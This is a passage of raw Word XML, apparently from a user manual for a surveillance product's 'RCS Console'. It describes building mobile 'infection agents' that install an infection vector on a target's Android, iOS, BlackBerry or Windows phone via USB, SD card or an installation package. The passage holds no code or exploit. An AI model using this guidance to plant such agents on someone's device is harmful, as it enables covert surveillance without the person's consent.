        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA3CC8" w:rsidRPr="008254AB" w:rsidRDefault="00DA3CC8" w:rsidP="00DA3CC8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- - - - - - - - - -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C4AE3" w:rsidRDefault="007C4AE3" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA3CC8" w:rsidRDefault="00DA3CC8" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C7B8A" w:rsidRDefault="007C7B8A" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The interaction between Actions and Modules is done through the connection points “Start” and “Stop”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D641D7" w:rsidRPr="004B1CEA" w:rsidRDefault="00D641D7" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Start Action has a green arrow. The Stop Action has a red arrow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D641D7" w:rsidRPr="004B1CEA" w:rsidRDefault="00D641D7" w:rsidP="00D641D7">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D641D7" w:rsidRPr="004B1CEA" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRPr="004B1CEA" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B1CEA">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="536D13A8" wp14:editId="1A97ED46">
                  <wp:extent cx="2083569" cy="22572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083569" cy="2257200"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRPr="004B1CEA" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRPr="004B1CEA" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B1CEA">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="517656B8" wp14:editId="43E9A4D7">
                  <wp:extent cx="2083569" cy="22572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83569" cy="2257200"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D641D7" w:rsidRPr="004B1CEA" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00057420" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRDefault="00732ABF" w:rsidP="006311A1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.34</w:t>
            </w:r>
            <w:r w:rsidR="00D641D7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D641D7" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00D641D7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="006311A1">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D641D7" w:rsidRPr="004B1CEA" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>START MODULE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRPr="004B1CEA" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00057420" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRDefault="00732ABF" w:rsidP="006311A1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.35</w:t>
            </w:r>
            <w:r w:rsidR="00D641D7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D641D7" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00D641D7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Target #</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00057420">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Factory #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="004B1CEA" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>STOP MODULE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A76B3F" w:rsidRDefault="00A76B3F" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc372642515"/>
      <w:r w:rsidRPr="00734B29">
        <w:lastRenderedPageBreak/>
        <w:t>Mobile Infection Agents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w:rsidR="00734B29" w:rsidRDefault="00734B29" w:rsidP="00734B29">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An Agent allows you to embed a previously configured Factory logic inside a final RCS infection vector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00734B29" w:rsidRDefault="00734B29" w:rsidP="00734B29">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00734B29" w:rsidRPr="002D7F2D" w:rsidRDefault="00734B29" w:rsidP="00734B29">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>There are 6 different types of Agents for Mobile platforms, which allow you to perform physical and remote infections. Before continuing, please be sure to read and fully understand the message below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00734B29" w:rsidRDefault="00734B29" w:rsidP="00734B29">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00734B29" w:rsidRDefault="00734B29" w:rsidP="00734B29">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="668F8477" wp14:editId="2AD9C9BC">
            <wp:extent cx="3708961" cy="2880000"/>
            <wp:effectExtent l="0" t="0" r="635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08961" cy="2880000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00734B29" w:rsidRPr="002D7F2D" w:rsidRDefault="00734B29" w:rsidP="00734B29">
      <w:pPr>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00734B29" w:rsidRDefault="00117549" w:rsidP="00734B29">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidR="00734B29" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1 [ RCS Console ] Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00734B29" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="00734B29" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00734B29" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="00734B29" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00734B29" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
      <w:r w:rsidR="00734B29" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Build</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00734B29" w:rsidRDefault="00734B29" w:rsidP="00734B29">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00734B29" w:rsidRDefault="00734B29">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc372642516"/>
      <w:r w:rsidRPr="00634565">
        <w:lastRenderedPageBreak/>
        <w:t>Local Installation Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424" w:rsidP="00A26424">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F11ACD" w:rsidRDefault="00F11ACD" w:rsidP="00F11ACD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Installation Agent allows to create an executable file suitable for the selected platform that will install the infection vector on the Target’s device </w:t>
      </w:r>
      <w:r w:rsidR="009E63A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>via USB cable or SD/MMC card</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F11ACD" w:rsidRDefault="00F11ACD" w:rsidP="00F11ACD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F11ACD" w:rsidRPr="002D7F2D" w:rsidRDefault="00F11ACD" w:rsidP="00F11ACD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Local Installation Agent is available for 3 platforms: BlackBerry, iOS and Windows Mobile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F11ACD" w:rsidRPr="002D7F2D" w:rsidRDefault="00F11ACD" w:rsidP="00F11ACD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F11ACD" w:rsidRPr="002D7F2D" w:rsidRDefault="00D96EE4" w:rsidP="00F11ACD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4050000" cy="3240000"/>
            <wp:effectExtent l="0" t="0" r="825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F11ACD" w:rsidRPr="002D7F2D" w:rsidRDefault="00F11ACD" w:rsidP="00F11ACD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F11ACD" w:rsidRPr="002D7F2D" w:rsidRDefault="00117549" w:rsidP="00F11ACD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9.2</w:t>
      </w:r>
      <w:r w:rsidR="00F11ACD" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00F11ACD" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="00F11ACD" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00F11ACD" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="00F11ACD" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00F11ACD" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
      <w:r w:rsidR="00F11ACD" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Build (</w:t>
      </w:r>
      <w:r w:rsidR="00D96EE4">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Local Installation</w:t>
      </w:r>
      <w:r w:rsidR="00F11ACD" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007703E3" w:rsidRDefault="007703E3" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc372642517"/>
      <w:r w:rsidRPr="00634565">
        <w:lastRenderedPageBreak/>
        <w:t>Installation Package Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424" w:rsidP="00A26424">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C40C0" w:rsidRDefault="000C40C0" w:rsidP="000C40C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Installation Package Agent allows to create an executable file suitable for the selected platform that will install the infection vector on the Target’s device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C40C0" w:rsidRDefault="000C40C0" w:rsidP="000C40C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C40C0" w:rsidRPr="002D7F2D" w:rsidRDefault="000C40C0" w:rsidP="000C40C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Installation Package Agent is available for 6 platforms: Android, BlackBerry, iOS, Symbian, Windows Mobile and Windows Phone.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C40C0" w:rsidRPr="002D7F2D" w:rsidRDefault="000C40C0" w:rsidP="000C40C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C40C0" w:rsidRPr="002D7F2D" w:rsidRDefault="00D96EE4" w:rsidP="000C40C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4050000" cy="3240000"/>
